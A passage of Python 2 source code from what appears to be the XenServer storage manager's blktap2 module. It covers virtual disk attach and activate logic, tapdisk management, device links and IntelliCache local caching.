CONF_KEY_CACHE_SR = "local_cache_sr"
CONF_KEY_O_DIRECT = "o_direct"
LOCK_CACHE_SETUP = "cachesetup"
ATTACH_DETACH_RETRY_SECS = 120
# number of seconds on top of NFS timeo mount option the tapdisk should
# wait before reporting errors. This is to allow a retry to succeed in case
# packets were lost the first time around, which prevented the NFS client
# from returning before the timeo is reached even if the NFS server did
# come back earlier
TAPDISK_TIMEOUT_MARGIN = 30
def __init__(self, uuid, target, driver_info):
self.target = self.TargetDriver(target, driver_info)
self._vdi_uuid = uuid
self._session = target.session
self.xenstore_data = scsiutil.update_XS_SCSIdata(uuid,scsiutil.gen_synthetic_page_data(uuid))
self.__o_direct = None
self.__o_direct_reason = None
self.lock = Lock("vdi", uuid)
def get_o_direct_capability(self, options):
"""Returns True/False based on licensing and caching_params"""
if self.__o_direct is not None:
return self.__o_direct, self.__o_direct_reason
if util.read_caching_is_restricted(self._session):
self.__o_direct = True
self.__o_direct_reason = "LICENSE_RESTRICTION"
elif not ((self.target.vdi.sr.handles("nfs") or self.target.vdi.sr.handles("ext") or self.target.vdi.sr.handles("smb"))):
self.__o_direct = True
self.__o_direct_reason = "SR_NOT_SUPPORTED"
elif not (options.get("rdonly") or self.target.vdi.parent):
util.SMlog(self.target.vdi)
self.__o_direct = True
self.__o_direct_reason = "NO_RO_IMAGE"
elif options.get("rdonly") and not self.target.vdi.parent:
self.__o_direct = True
self.__o_direct_reason = "RO_WITH_NO_PARENT"
elif options.get(self.CONF_KEY_O_DIRECT):
self.__o_direct = True
self.__o_direct_reason = "SR_OVERRIDE"
if self.__o_direct is None:
self.__o_direct = False
self.__o_direct_reason = ""
return self.__o_direct, self.__o_direct_reason
@classmethod
def from_cli(cls, uuid):
import VDI as sm
import XenAPI
session = XenAPI.xapi_local()
session.xenapi.login_with_password('root', '', '', 'SM')
target = sm.VDI.from_uuid(session, uuid)
driver_info = target.sr.srcmd.driver_info
session.xenapi.session.logout()
return cls(uuid, target, driver_info)
@staticmethod
def _tap_type(vdi_type):
"""Map a VDI type (e.g. 'raw') to a tapdisk driver type (e.g. 'aio')"""
return {
'raw' : 'aio',
'vhd' : 'vhd',
'iso' : 'aio', # for ISO SR
'aio' : 'aio', # for LVHD
'file' : 'aio',
'phy' : 'aio'
} [vdi_type]
def get_tap_type(self):
vdi_type = self.target.get_vdi_type()
return VDI._tap_type(vdi_type)
def get_phy_path(self):
return self.target.get_vdi_path()
class UnexpectedVDIType(Exception):
def __init__(self, vdi_type, target):
self.vdi_type = vdi_type
self.target = target
def __str__(self):
return \
"Target %s has unexpected VDI type '%s'" % \
(type(self.target), self.vdi_type)
VDI_PLUG_TYPE = { 'phy' : 'phy', # for NETAPP
'raw' : 'phy',
'aio' : 'tap', # for LVHD raw nodes
'iso' : 'tap', # for ISOSR
'file' : 'tap',
'vhd' : 'tap' }
def tap_wanted(self):
# 1. Let the target vdi_type decide
vdi_type = self.target.get_vdi_type()
try:
plug_type = self.VDI_PLUG_TYPE[vdi_type]
except KeyError:
raise self.UnexpectedVDIType(vdi_type,
self.target.vdi)
if plug_type == 'tap':
return True
elif self.target.vdi.sr.handles('udev'):
return True
# 2. Otherwise, there may be more reasons
#
# .. TBD
return False
class TargetDriver:
"""Safe target driver access."""
# NB. *Must* test caps for optional calls. Some targets
# actually implement some slots, but do not enable them. Just
# try/except would risk breaking compatibility.
def __init__(self, vdi, driver_info):
self.vdi = vdi
self._caps = driver_info['capabilities']
def has_cap(self, cap):
"""Determine if target has given capability"""
return cap in self._caps
def attach(self, sr_uuid, vdi_uuid):
#assert self.has_cap("VDI_ATTACH")
return self.vdi.attach(sr_uuid, vdi_uuid)
def detach(self, sr_uuid, vdi_uuid):
#assert self.has_cap("VDI_DETACH")
self.vdi.detach(sr_uuid, vdi_uuid)
def activate(self, sr_uuid, vdi_uuid):
if self.has_cap("VDI_ACTIVATE"):
return self.vdi.activate(sr_uuid, vdi_uuid)
def deactivate(self, sr_uuid, vdi_uuid):
if self.has_cap("VDI_DEACTIVATE"):
self.vdi.deactivate(sr_uuid, vdi_uuid)
#def resize(self, sr_uuid, vdi_uuid, size):
# return self.vdi.resize(sr_uuid, vdi_uuid, size)
def get_vdi_type(self):
_type = self.vdi.vdi_type
if not _type:
_type = self.vdi.sr.sr_vditype
if not _type:
raise VDI.UnexpectedVDIType(_type, self.vdi)
return _type
def get_vdi_path(self):
return self.vdi.path
class Link(object):
"""Relink a node under a common name"""
# NB. We have to provide the device node path during
# VDI.attach, but currently do not allocate the tapdisk minor
# before VDI.activate. Therefore those link steps where we
# relink existing devices under deterministic path names.
BASEDIR = None
def _mklink(self, target):
raise NotImplementedError("_mklink is not defined")
def _equals(self, target):
raise NotImplementedError("_equals is not defined")
def __init__(self, path):
self._path = path
@classmethod
def from_name(cls, name):
path = "%s/%s" % (cls.BASEDIR, name)
return cls(path)
@classmethod
def from_uuid(cls, sr_uuid, vdi_uuid):
name = "%s/%s" % (sr_uuid, vdi_uuid)
return cls.from_name(name)
def path(self):
return self._path
def stat(self):
return os.stat(self.path())
def mklink(self, target):
path = self.path()
util.SMlog("%s -> %s" % (self, target))
mkdirs(os.path.dirname(path))
try:
self._mklink(target)
except OSError, e:
# We do unlink during teardown, but have to stay
# idempotent. However, a *wrong* target should never
# be seen.
if e.errno != errno.EEXIST: raise
assert self._equals(target), "'%s' not equal to '%s'" % (path, target)
def unlink(self):
try:
os.unlink(self.path())
except OSError, e:
if e.errno != errno.ENOENT: raise
def __str__(self):
path = self.path()
return "%s(%s)" % (self.__class__.__name__, path)
class SymLink(Link):
"""Symlink some file to a common name"""
def readlink(self):
return os.readlink(self.path())
def symlink(self):
return self.path()
def _mklink(self, target):
os.symlink(target, self.path())
def _equals(self, target):
return self.readlink() == target
class DeviceNode(Link):
"""Relink a block device node to a common name"""
@classmethod
def _real_stat(cls, target):
"""stat() not on @target, but its realpath()"""
_target = os.path.realpath(target)
return os.stat(_target)
@classmethod
def is_block(cls, target):
"""Whether @target refers to a block device."""
return S_ISBLK(cls._real_stat(target).st_mode)
def _mklink(self, target):
st = self._real_stat(target)
if not S_ISBLK(st.st_mode):
raise self.NotABlockDevice(target, st)
os.mknod(self.path(), st.st_mode, st.st_rdev)
def _equals(self, target):
target_rdev = self._real_stat(target).st_rdev
return self.stat().st_rdev == target_rdev
def rdev(self):
st = self.stat()
assert S_ISBLK(st.st_mode)
return os.major(st.st_rdev), os.minor(st.st_rdev)
class NotABlockDevice(Exception):
def __init__(self, path, st):
self.path = path
self.st = st
def __str__(self):
return "%s is not a block device: %s" % (self.path, self.st)
class Hybrid(Link):
def __init__(self, path):
VDI.Link.__init__(self, path)
self._devnode = VDI.DeviceNode(path)
self._symlink = VDI.SymLink(path)
def rdev(self):
st = self.stat()
if S_ISBLK(st.st_mode): return self._devnode.rdev()
raise self._devnode.NotABlockDevice(self.path(), st)
def mklink(self, target):
if self._devnode.is_block(target):
self._obj = self._devnode
else:
self._obj = self._symlink
self._obj.mklink(target)
def _equals(self, target):
return self._obj._equals(target)
class PhyLink(SymLink): BASEDIR = "/dev/sm/phy"
# NB. Cannot use DeviceNodes, e.g. FileVDIs aren't bdevs.
class BackendLink(Hybrid): BASEDIR = "/dev/sm/backend"
# NB. Could be SymLinks as well, but saving major,minor pairs in
# Links enables neat state capturing when managing Tapdisks. Note
# that we essentially have a tap-ctl list replacement here. For
# now make it a 'Hybrid'. Likely to collapse into a DeviceNode as
# soon as ISOs are tapdisks.
@staticmethod
def _tap_activate(phy_path, vdi_type, sr_uuid, options, pool_size = None):
tapdisk = Tapdisk.find_by_path(phy_path)
if not tapdisk:
blktap = Blktap.allocate()
blktap.set_pool_name(sr_uuid)
if pool_size:
blktap.set_pool_size(pool_size)
try:
tapdisk = \
Tapdisk.launch_on_tap(blktap,
phy_path,
VDI._tap_type(vdi_type),
options)
except:
blktap.free()
raise
util.SMlog("tap.activate: Launched %s" % tapdisk)
else:
util.SMlog("tap.activate: Found %s" % tapdisk)
return tapdisk.get_devpath()
@staticmethod
def _tap_deactivate(minor):
try:
tapdisk = Tapdisk.from_minor(minor)
except TapdiskNotRunning, e:
util.SMlog("tap.deactivate: Warning, %s" % e)
# NB. Should not be here unless the agent refcount
# broke. Also, a clean shutdown should not have leaked
# the recorded minor.
else:
tapdisk.shutdown()
util.SMlog("tap.deactivate: Shut down %s" % tapdisk)
@classmethod
def tap_pause(cls, session, sr_uuid, vdi_uuid, failfast=False):
"""
Pauses the tapdisk.
session: a XAPI session
sr_uuid: the UUID of the SR on which VDI lives
vdi_uuid: the UUID of the VDI to pause
failfast: controls whether the VDI lock should be acquired in a
non-blocking manner
"""
util.SMlog("Pause request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
session.xenapi.VDI.add_to_sm_config(vdi_ref, 'paused', 'true')
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-pause on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "pause", failfast=failfast):
# Failed to pause node
session.xenapi.VDI.remove_from_sm_config(vdi_ref, 'paused')
return False
return True
@classmethod
def tap_unpause(cls, session, sr_uuid, vdi_uuid, secondary = None,
activate_parents = False):
util.SMlog("Unpause request for %s secondary=%s" % (vdi_uuid, secondary))
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-unpause on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "unpause", secondary, activate_parents):
# Failed to unpause node
return False
session.xenapi.VDI.remove_from_sm_config(vdi_ref, 'paused')
return True
@classmethod
def tap_refresh(cls, session, sr_uuid, vdi_uuid, activate_parents = False):
util.SMlog("Refresh request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
host_ref = key[len('host_'):]
util.SMlog("Calling tap-refresh on host %s" % host_ref)
if not cls.call_pluginhandler(session, host_ref,
sr_uuid, vdi_uuid, "refresh", None,
activate_parents=activate_parents):
# Failed to refresh node
return False
return True
@classmethod
def tap_status(cls, session, vdi_uuid):
"""Return True if disk is attached, false if it isn't"""
util.SMlog("Disk status request for %s" % vdi_uuid)
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
for key in filter(lambda x: x.startswith('host_'), sm_config.keys()):
return True
return False
@classmethod
def call_pluginhandler(cls, session, host_ref, sr_uuid, vdi_uuid, action,
secondary = None, activate_parents = False, failfast=False):
"""Optionally, activate the parent LV before unpausing"""
try:
args = {"sr_uuid":sr_uuid, "vdi_uuid":vdi_uuid,
"failfast": str(failfast)}
if secondary:
args["secondary"] = secondary
if activate_parents:
args["activate_parents"] = "true"
ret = session.xenapi.host.call_plugin(
host_ref, PLUGIN_TAP_PAUSE, action,
args)
return ret == "True"
except Exception, e:
util.logException("BLKTAP2:call_pluginhandler %s" % e)
return False
def _add_tag(self, vdi_uuid, writable):
util.SMlog("Adding tag to: %s" % vdi_uuid)
attach_mode = "RO"
if writable:
attach_mode = "RW"
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
host_ref = self._session.xenapi.host.get_by_uuid(util.get_this_host())
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
attached_as = util.attached_as(sm_config)
if NO_MULTIPLE_ATTACH and (attached_as == "RW" or \
(attached_as == "RO" and attach_mode == "RW")):
util.SMlog("need to reset VDI %s" % vdi_uuid)
if not resetvdis.reset_vdi(self._session, vdi_uuid, force=False,
term_output=False, writable=writable):
raise util.SMException("VDI %s not detached cleanly" % vdi_uuid)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Paused or host_ref key found [%s]" % sm_config)
return False
host_key = "host_%s" % host_ref
assert not sm_config.has_key(host_key)
self._session.xenapi.VDI.add_to_sm_config(vdi_ref, host_key,
attach_mode)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Found paused key, aborting")
self._session.xenapi.VDI.remove_from_sm_config(vdi_ref, host_key)
return False
util.SMlog("Activate lock succeeded")
return True
def _check_tag(self, vdi_uuid):
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
if sm_config.has_key('paused'):
util.SMlog("Paused key found [%s]" % sm_config)
return False
return True
def _remove_tag(self, vdi_uuid):
vdi_ref = self._session.xenapi.VDI.get_by_uuid(vdi_uuid)
host_ref = self._session.xenapi.host.get_by_uuid(util.get_this_host())
sm_config = self._session.xenapi.VDI.get_sm_config(vdi_ref)
host_key = "host_%s" % host_ref
if sm_config.has_key(host_key):
self._session.xenapi.VDI.remove_from_sm_config(vdi_ref, host_key)
util.SMlog("Removed host key %s for %s" % (host_key, vdi_uuid))
else:
util.SMlog("_remove_tag: host key %s not found, ignore" % host_key)
def _get_pool_config(self, pool_name):
pool_info = dict()
vdi_ref = self.target.vdi.sr.srcmd.params.get('vdi_ref')
if not vdi_ref:
# attach_from_config context: HA disks don't need to be in any
# special pool
return pool_info
session = XenAPI.xapi_local()
session.xenapi.login_with_password('root', '', '', 'SM')
sr_ref = self.target.vdi.sr.srcmd.params.get('sr_ref')
sr_config = session.xenapi.SR.get_other_config(sr_ref)
vdi_config = session.xenapi.VDI.get_other_config(vdi_ref)
pool_size_str = sr_config.get(POOL_SIZE_KEY)
pool_name_override = vdi_config.get(POOL_NAME_KEY)
if pool_name_override:
pool_name = pool_name_override
pool_size_override = vdi_config.get(POOL_SIZE_KEY)
if pool_size_override:
pool_size_str = pool_size_override
pool_size = 0
if pool_size_str:
try:
pool_size = int(pool_size_str)
if pool_size < 1 or pool_size > MAX_FULL_RINGS:
raise ValueError("outside of range")
pool_size = NUM_PAGES_PER_RING * pool_size
except ValueError:
util.SMlog("Error: invalid mem-pool-size %s" % pool_size_str)
pool_size = 0
pool_info["mem-pool"] = pool_name
if pool_size:
pool_info["mem-pool-size"] = str(pool_size)
session.xenapi.session.logout()
return pool_info
def attach(self, sr_uuid, vdi_uuid, writable, activate = False, caching_params = {}):
"""Return/dev/sm/backend symlink path"""
self.xenstore_data.update(self._get_pool_config(sr_uuid))
if not self.target.has_cap("ATOMIC_PAUSE") or activate:
util.SMlog("Attach & activate")
self._attach(sr_uuid, vdi_uuid)
dev_path = self._activate(sr_uuid, vdi_uuid,
{"rdonly": not writable})
self.BackendLink.from_uuid(sr_uuid, vdi_uuid).mklink(dev_path)
# Return backend/ link
back_path = self.BackendLink.from_uuid(sr_uuid, vdi_uuid).path()
options = {"rdonly": not writable}
options.update(caching_params)
o_direct, o_direct_reason = self.get_o_direct_capability(options)
struct = { 'params': back_path,
'o_direct': o_direct,
'o_direct_reason': o_direct_reason,
'xenstore_data': self.xenstore_data}
util.SMlog('result: %s' % struct)
try:
f=open("%s.attach_info" % back_path, 'a')
f.write(xmlrpclib.dumps((struct,), "", True))
f.close()
except:
pass
return xmlrpclib.dumps((struct,), "", True)
def activate(self, sr_uuid, vdi_uuid, writable, caching_params):
util.SMlog("blktap2.activate")
options = {"rdonly": not writable}
options.update(caching_params)
sr_ref = self.target.vdi.sr.srcmd.params.get('sr_ref')
sr_other_config = self._session.xenapi.SR.get_other_config(sr_ref)
timeout = nfs.get_nfs_timeout(sr_other_config)
if timeout:
# Note NFS timeout values are in deciseconds
timeout = int((timeout+5) / 10)
options["timeout"] = timeout + self.TAPDISK_TIMEOUT_MARGIN
for i in range(self.ATTACH_DETACH_RETRY_SECS):
try:
if self._activate_locked(sr_uuid, vdi_uuid, options):
return
except util.SRBusyException:
util.SMlog("SR locked, retrying")
time.sleep(1)
raise util.SMException("VDI %s locked" % vdi_uuid)
@locking("VDIUnavailable")
def _activate_locked(self, sr_uuid, vdi_uuid, options):
"""Wraps target.activate and adds a tapdisk"""
import VDI as sm
#util.SMlog("VDI.activate %s" % vdi_uuid)
if self.tap_wanted():
if not self._add_tag(vdi_uuid, not options["rdonly"]):
return False
# it is possible that while the VDI was paused some of its
# attributes have changed (e.g. its size if it was inflated; or its
# path if it was leaf-coalesced onto a raw LV), so refresh the
# object completely
params = self.target.vdi.sr.srcmd.params
target = sm.VDI.from_uuid(self.target.vdi.session, vdi_uuid)
target.sr.srcmd.params = params
driver_info = target.sr.srcmd.driver_info
self.target = self.TargetDriver(target, driver_info)
try:
util.fistpoint.activate_custom_fn(
"blktap_activate_inject_failure",
lambda: util.inject_failure())
# Attach the physical node
if self.target.has_cap("ATOMIC_PAUSE"):
self._attach(sr_uuid, vdi_uuid)
vdi_type = self.target.get_vdi_type()
# Take lvchange-p Lock before running
# tap-ctl open
# Needed to avoid race with lvchange -p which is
# now taking the same lock
# This is a fix for CA-155766
if hasattr(self.target.vdi.sr, 'DRIVER_TYPE') and \
self.target.vdi.sr.DRIVER_TYPE == 'lvhd' and \
vdi_type == vhdutil.VDI_TYPE_VHD:
lock = Lock("lvchange-p", lvhdutil.NS_PREFIX_LVM + sr_uuid)
lock.acquire()
# When we attach a static VDI for HA, we cannot communicate with
# xapi, because has not started yet. These VDIs are raw.
if vdi_type != vhdutil.VDI_TYPE_RAW:
session = self.target.vdi.session
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
sm_config = session.xenapi.VDI.get_sm_config(vdi_ref)
if 'key_hash' in sm_config:
key_hash = sm_config['key_hash']
options['key_hash'] = key_hash
options['vdi_uuid'] = vdi_uuid
util.SMlog('Using key with hash {} for VDI {}'.format(key_hash, vdi_uuid))
# Activate the physical node
dev_path = self._activate(sr_uuid, vdi_uuid, options)
if hasattr(self.target.vdi.sr, 'DRIVER_TYPE') and \
self.target.vdi.sr.DRIVER_TYPE == 'lvhd' and \
self.target.get_vdi_type() == vhdutil.VDI_TYPE_VHD:
lock.release()
except:
util.SMlog("Exception in activate/attach")
if self.tap_wanted():
util.fistpoint.activate_custom_fn(
"blktap_activate_error_handling",
lambda: time.sleep(30))
while True:
try:
self._remove_tag(vdi_uuid)
break
except xmlrpclib.ProtocolError, e:
# If there's a connection error, keep trying forever.
if e.errcode == httplib.INTERNAL_SERVER_ERROR:
continue
else:
util.SMlog('failed to remove tag: %s' % e)
break
except Exception, e:
util.SMlog('failed to remove tag: %s' % e)
break
raise
# Link result to backend/
self.BackendLink.from_uuid(sr_uuid, vdi_uuid).mklink(dev_path)
return True
def _activate(self, sr_uuid, vdi_uuid, options):
vdi_options = self.target.activate(sr_uuid, vdi_uuid)
dev_path = self.setup_cache(sr_uuid, vdi_uuid, options)
if not dev_path:
phy_path = self.PhyLink.from_uuid(sr_uuid, vdi_uuid).readlink()
# Maybe launch a tapdisk on the physical link
if self.tap_wanted():
vdi_type = self.target.get_vdi_type()
options["o_direct"] = self.get_o_direct_capability(options)[0]
if vdi_options:
options.update(vdi_options)
dev_path = self._tap_activate(phy_path, vdi_type, sr_uuid,
options,
self._get_pool_config(sr_uuid).get("mem-pool-size"))
else:
dev_path = phy_path # Just reuse phy
return dev_path
def _attach(self, sr_uuid, vdi_uuid):
attach_info = xmlrpclib.loads(self.target.attach(sr_uuid, vdi_uuid))[0][0]
params = attach_info['params']
xenstore_data = attach_info['xenstore_data']
phy_path = util.to_plain_string(params)
self.xenstore_data.update(xenstore_data)
# Save it to phy/
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).mklink(phy_path)
def deactivate(self, sr_uuid, vdi_uuid, caching_params):
util.SMlog("blktap2.deactivate")
for i in range(self.ATTACH_DETACH_RETRY_SECS):
try:
if self._deactivate_locked(sr_uuid, vdi_uuid, caching_params):
return
except util.SRBusyException, e:
util.SMlog("SR locked, retrying")
time.sleep(1)
raise util.SMException("VDI %s locked" % vdi_uuid)
@locking("VDIUnavailable")
def _deactivate_locked(self, sr_uuid, vdi_uuid, caching_params):
"""Wraps target.deactivate and removes a tapdisk"""
#util.SMlog("VDI.deactivate %s" % vdi_uuid)
if self.tap_wanted() and not self._check_tag(vdi_uuid):
return False
self._deactivate(sr_uuid, vdi_uuid, caching_params)
if self.target.has_cap("ATOMIC_PAUSE"):
self._detach(sr_uuid, vdi_uuid)
if self.tap_wanted():
self._remove_tag(vdi_uuid)
return True
def _resetPhylink(self, sr_uuid, vdi_uuid, path):
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).mklink(path)
def detach(self, sr_uuid, vdi_uuid, deactivate = False, caching_params = {}):
if not self.target.has_cap("ATOMIC_PAUSE") or deactivate:
util.SMlog("Deactivate & detach")
self._deactivate(sr_uuid, vdi_uuid, caching_params)
self._detach(sr_uuid, vdi_uuid)
else:
pass # nothing to do
def _deactivate(self, sr_uuid, vdi_uuid, caching_params):
import VDI as sm
# Shutdown tapdisk
back_link = self.BackendLink.from_uuid(sr_uuid, vdi_uuid)
if not util.pathexists(back_link.path()):
util.SMlog("Backend path %s does not exist" % back_link.path())
return
try:
attach_info_path = "%s.attach_info" % (back_link.path())
os.unlink(attach_info_path)
except:
util.SMlog("unlink of attach_info failed")
try:
major, minor = back_link.rdev()
except self.DeviceNode.NotABlockDevice:
pass
else:
if major == Tapdisk.major():
self._tap_deactivate(minor)
self.remove_cache(sr_uuid, vdi_uuid, caching_params)
# Remove the backend link
back_link.unlink()
# Deactivate & detach the physical node
if self.tap_wanted() and self.target.vdi.session is not None:
# it is possible that while the VDI was paused some of its
# attributes have changed (e.g. its size if it was inflated; or its
# path if it was leaf-coalesced onto a raw LV), so refresh the
# object completely
target = sm.VDI.from_uuid(self.target.vdi.session, vdi_uuid)
driver_info = target.sr.srcmd.driver_info
self.target = self.TargetDriver(target, driver_info)
self.target.deactivate(sr_uuid, vdi_uuid)
def _detach(self, sr_uuid, vdi_uuid):
self.target.detach(sr_uuid, vdi_uuid)
# Remove phy/
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).unlink()
def _updateCacheRecord(self, session, vdi_uuid, on_boot, caching):
# Remove existing VDI.sm_config fields
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
for key in ["on_boot", "caching"]:
session.xenapi.VDI.remove_from_sm_config(vdi_ref,key)
if not on_boot is None:
session.xenapi.VDI.add_to_sm_config(vdi_ref,'on_boot',on_boot)
if not caching is None:
session.xenapi.VDI.add_to_sm_config(vdi_ref,'caching',caching)
def setup_cache(self, sr_uuid, vdi_uuid, params):
if params.get(self.CONF_KEY_ALLOW_CACHING) != "true":
return
util.SMlog("Requested local caching")
if not self.target.has_cap("SR_CACHING"):
util.SMlog("Error: local caching not supported by this SR")
return
scratch_mode = False
if params.get(self.CONF_KEY_MODE_ON_BOOT) == "reset":
scratch_mode = True
util.SMlog("Requested scratch mode")
if not self.target.has_cap("VDI_RESET_ON_BOOT/2"):
util.SMlog("Error: scratch mode not supported by this SR")
return
dev_path = None
local_sr_uuid = params.get(self.CONF_KEY_CACHE_SR)
if not local_sr_uuid:
util.SMlog("ERROR: Local cache SR not specified, not enabling")
return
dev_path = self._setup_cache(self._session, sr_uuid, vdi_uuid,
local_sr_uuid, scratch_mode, params)
if dev_path:
self._updateCacheRecord(self._session, self.target.vdi.uuid,
params.get(self.CONF_KEY_MODE_ON_BOOT),
params.get(self.CONF_KEY_ALLOW_CACHING))
return dev_path
def alert_no_cache(self, session, vdi_uuid, cache_sr_uuid, err):
vm_uuid = None
vm_label = ""
try:
cache_sr_ref = session.xenapi.SR.get_by_uuid(cache_sr_uuid)
cache_sr_rec = session.xenapi.SR.get_record(cache_sr_ref)
cache_sr_label = cache_sr_rec.get("name_label")
host_ref = session.xenapi.host.get_by_uuid(util.get_this_host())
host_rec = session.xenapi.host.get_record(host_ref)
host_label = host_rec.get("name_label")
vdi_ref = session.xenapi.VDI.get_by_uuid(vdi_uuid)
vbds = session.xenapi.VBD.get_all_records_where( \
"field \"VDI\" = \"%s\"" % vdi_ref)
for vbd_rec in vbds.values():
vm_ref = vbd_rec.get("VM")
vm_rec = session.xenapi.VM.get_record(vm_ref)
vm_uuid = vm_rec.get("uuid")
vm_label = vm_rec.get("name_label")
except:
util.logException("alert_no_cache")
alert_obj = "SR"
alert_uuid = str(cache_sr_uuid)
alert_str = "No space left in Local Cache SR %s" % cache_sr_uuid
if vm_uuid:
alert_obj = "VM"
alert_uuid = vm_uuid
reason = ""
if err == errno.ENOSPC:
reason = "because there is no space left"
alert_str = "The VM \"%s\" is not using IntelliCache %s on the Local Cache SR (\"%s\") on host \"%s\"" % \
(vm_label, reason, cache_sr_label, host_label)
util.SMlog("Creating alert: (%s, %s, \"%s\")" % \
(alert_obj, alert_uuid, alert_str))
session.xenapi.message.create("No space left in local cache", "3",
alert_obj, alert_uuid, alert_str)
def _setup_cache(self, session, sr_uuid, vdi_uuid, local_sr_uuid,
scratch_mode, options):
import SR
import EXTSR
import NFSSR
import XenAPI
from lock import Lock
from FileSR import FileVDI
parent_uuid = vhdutil.getParent(self.target.vdi.path,
FileVDI.extractUuid)
if not parent_uuid:
util.SMlog("ERROR: VDI %s has no parent, not enabling" % \
self.target.vdi.uuid)
return
util.SMlog("Setting up cache")
parent_uuid = parent_uuid.strip()
shared_target = NFSSR.NFSFileVDI(self.target.vdi.sr, parent_uuid)
if shared_target.parent:
util.SMlog("ERROR: Parent VDI %s has parent, not enabling" %
shared_target.uuid)
return
SR.registerSR(EXTSR.EXTSR)
local_sr = SR.SR.from_uuid(session, local_sr_uuid)
lock = Lock(self.LOCK_CACHE_SETUP, parent_uuid)
lock.acquire()
# read cache
read_cache_path = "%s/%s.vhdcache" % (local_sr.path, shared_target.uuid)
if util.pathexists(read_cache_path):
util.SMlog("Read cache node (%s) already exists, not creating" % \
read_cache_path)
else:
try:
vhdutil.snapshot(read_cache_path, shared_target.path, False)
except util.CommandException, e:
util.SMlog("Error creating parent cache: %s" % e)
self.alert_no_cache(session, vdi_uuid, local_sr_uuid, e.code)
return None
# local write node
leaf_size = vhdutil.getSizeVirt(self.target.vdi.path)
local_leaf_path = "%s/%s.vhdcache" % \
(local_sr.path, self.target.vdi.uuid)
if util.pathexists(local_leaf_path):
util.SMlog("Local leaf node (%s) already exists, deleting" % \
local_leaf_path)
os.unlink(local_leaf_path)
try:
vhdutil.snapshot(local_leaf_path, read_cache_path, False,
msize = leaf_size / 1024 / 1024, checkEmpty = False)
except util.CommandException, e:
util.SMlog("Error creating leaf cache: %s" % e)
self.alert_no_cache(session, vdi_uuid, local_sr_uuid, e.code)
return None
local_leaf_size = vhdutil.getSizeVirt(local_leaf_path)
if leaf_size > local_leaf_size:
util.SMlog("Leaf size %d > local leaf cache size %d, resizing" %
(leaf_size, local_leaf_size))
vhdutil.setSizeVirtFast(local_leaf_path, leaf_size)
vdi_type = self.target.get_vdi_type()
prt_tapdisk = Tapdisk.find_by_path(read_cache_path)
if not prt_tapdisk:
parent_options = copy.deepcopy(options)
parent_options["rdonly"] = False
parent_options["lcache"] = True
blktap = Blktap.allocate()
try:
blktap.set_pool_name("lcache-parent-pool-%s" % blktap.minor)
# no need to change pool_size since each parent tapdisk is in
# its own pool
prt_tapdisk = \
Tapdisk.launch_on_tap(blktap, read_cache_path,
'vhd', parent_options)
except:
blktap.free()
raise
secondary = "%s:%s" % (self.target.get_vdi_type(),
self.PhyLink.from_uuid(sr_uuid, vdi_uuid).readlink())
util.SMlog("Parent tapdisk: %s" % prt_tapdisk)
leaf_tapdisk = Tapdisk.find_by_path(local_leaf_path)
if not leaf_tapdisk:
blktap = Blktap.allocate()
child_options = copy.deepcopy(options)
child_options["rdonly"] = False
child_options["lcache"] = False
child_options["existing_prt"] = prt_tapdisk.minor
child_options["secondary"] = secondary
child_options["standby"] = scratch_mode
try:
leaf_tapdisk = \
Tapdisk.launch_on_tap(blktap, local_leaf_path,
'vhd', child_options)
except:
blktap.free()
raise
lock.release()
util.SMlog("Local read cache: %s, local leaf: %s" % \
(read_cache_path, local_leaf_path))
return leaf_tapdisk.get_devpath()
def remove_cache(self, sr_uuid, vdi_uuid, params):
if not self.target.has_cap("SR_CACHING"):
return
caching = params.get(self.CONF_KEY_ALLOW_CACHING) == "true"
local_sr_uuid = params.get(self.CONF_KEY_CACHE_SR)
if caching and not local_sr_uuid:
util.SMlog("ERROR: Local cache SR not specified, ignore")
return
if caching:
self._remove_cache(self._session, local_sr_uuid)
if self._session is not None:
self._updateCacheRecord(self._session, self.target.vdi.uuid, None, None)
def _is_tapdisk_in_use(self, minor):
(retVal, links) = util.findRunningProcessOrOpenFile("tapdisk")
if not retVal:
# err on the side of caution
return True
for link in links:
if link.find("tapdev%d" % minor) != -1:
return True
return False
def _remove_cache(self, session, local_sr_uuid):
import SR
import EXTSR
import NFSSR
import XenAPI
from lock import Lock
from FileSR import FileVDI
parent_uuid = vhdutil.getParent(self.target.vdi.path,
FileVDI.extractUuid)
if not parent_uuid:
util.SMlog("ERROR: No parent for VDI %s, ignore" % \
self.target.vdi.uuid)
return
util.SMlog("Tearing down the cache")
parent_uuid = parent_uuid.strip()
shared_target = NFSSR.NFSFileVDI(self.target.vdi.sr, parent_uuid)
SR.registerSR(EXTSR.EXTSR)
local_sr = SR.SR.from_uuid(session, local_sr_uuid)
lock = Lock(self.LOCK_CACHE_SETUP, parent_uuid)
lock.acquire()
# local write node
local_leaf_path = "%s/%s.vhdcache" % \
(local_sr.path, self.target.vdi.uuid)
